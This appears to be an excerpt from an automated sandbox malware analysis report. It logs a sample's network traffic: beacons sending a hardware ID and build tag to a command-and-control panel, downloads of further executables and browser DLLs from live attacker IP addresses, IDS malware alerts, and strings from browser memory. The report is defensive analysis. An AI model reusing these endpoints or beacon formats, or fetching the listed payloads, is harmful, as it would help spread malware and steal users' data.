Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 32 32 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1012283001&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJKKKJJJKJKFHJJJJECHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 39 41 39 41 43 42 37 32 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 2d 2d 0d 0a Data Ascii: ------JKJKKKJJJKJKFHJJJJECContent-Disposition: form-data; name="hwid"AA9A9ACB72684217651120------JKJKKKJJJKJKFHJJJJECContent-Disposition: form-data; name="build"drum------JKJKKKJJJKJKFHJJJJEC--
Source: global traffic | HTTP traffic detected: GET /files/martin/random.exe HTTP/1.1 | Host: 31.41.244.11
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCFBFBFBKFIDHJKFCAFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 39 41 39 41 43 42 37 32 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 2d 2d 0d 0a Data Ascii: ------BFCFBFBFBKFIDHJKFCAFContent-Disposition: form-data; name="hwid"AA9A9ACB72684217651120------BFCFBFBFBKFIDHJKFCAFContent-Disposition: form-data; name="build"drum------BFCFBFBFBKFIDHJKFCAF--
                          Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                          Source: Joe Sandbox ViewIP Address: 34.117.188.166 34.117.188.166
                          Source: Joe Sandbox ViewIP Address: 31.41.244.11 31.41.244.11
                          Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Joe Sandbox ViewJA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49714 -> 185.215.113.206:80
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49800 -> 2.20.60.64:443
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49809 -> 185.215.113.206:80
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49866 -> 185.215.113.16:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49923 -> 31.41.244.11:80
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49945 -> 172.67.181.44:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49947 -> 31.41.244.11:80
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49952 -> 172.67.181.44:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49970 -> 185.215.113.16:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49991 -> 185.215.113.16:80
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50002 -> 172.67.165.166:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50009 -> 172.67.165.166:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50012 -> 185.215.113.16:80
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50018 -> 172.67.165.166:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50024 -> 172.67.165.166:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50038 -> 172.67.165.166:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50032 -> 185.215.113.16:80
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50039 -> 172.67.165.166:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50030 -> 172.67.165.166:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50054 -> 172.67.165.166:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50069 -> 172.67.165.166:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50068 -> 31.41.244.11:80
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50082 -> 172.67.165.166:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50084 -> 172.67.165.166:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50089 -> 172.67.165.166:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50090 -> 172.67.165.166:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50085 -> 172.67.165.166:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50083 -> 172.67.165.166:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50088 -> 172.67.165.166:443
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6CA8CC60 PR_Recv,0_2_6CA8CC60
Source: global traffic | HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /files/rhnew.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic | HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic | HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic | HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub= HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 92.63.197.221Connection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic | HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 92.63.197.221Connection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 92.63.197.221Connection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 92.63.197.221Connection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic | HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 92.63.197.221Connection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic | HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: UpdateService:_selectAndInstallUpdate - update not supported for this system. Notifying observers. topic: update-available, status: unsupportedhttps://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/AND bookmarked equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: *://www.facebook.com/platform/impression.php*https://ads.stickyadstv.com/firefox-etp*://pixel.advertising.com/firefox-etpextensions.webextensions.warnings-as-errors equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002F.00000002.3450427284.000001F9409F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B0D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B0D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002F.00000002.3532560514.000001F944897000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F9445DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3532560514.000001F944807000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Downloader:onStopRequest - notifying observers of error. topic: update-error, status: download-attempts-exceeded, downloadAttempts: You must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContentUpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Downloader:onStopRequest - notifying observers of error. topic: update-error, status: download-attempts-exceeded, downloadAttempts: You must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContentUpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002F.00000002.3531852859.000001F94470A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002F.00000002.3531852859.000001F944703000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF24000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", 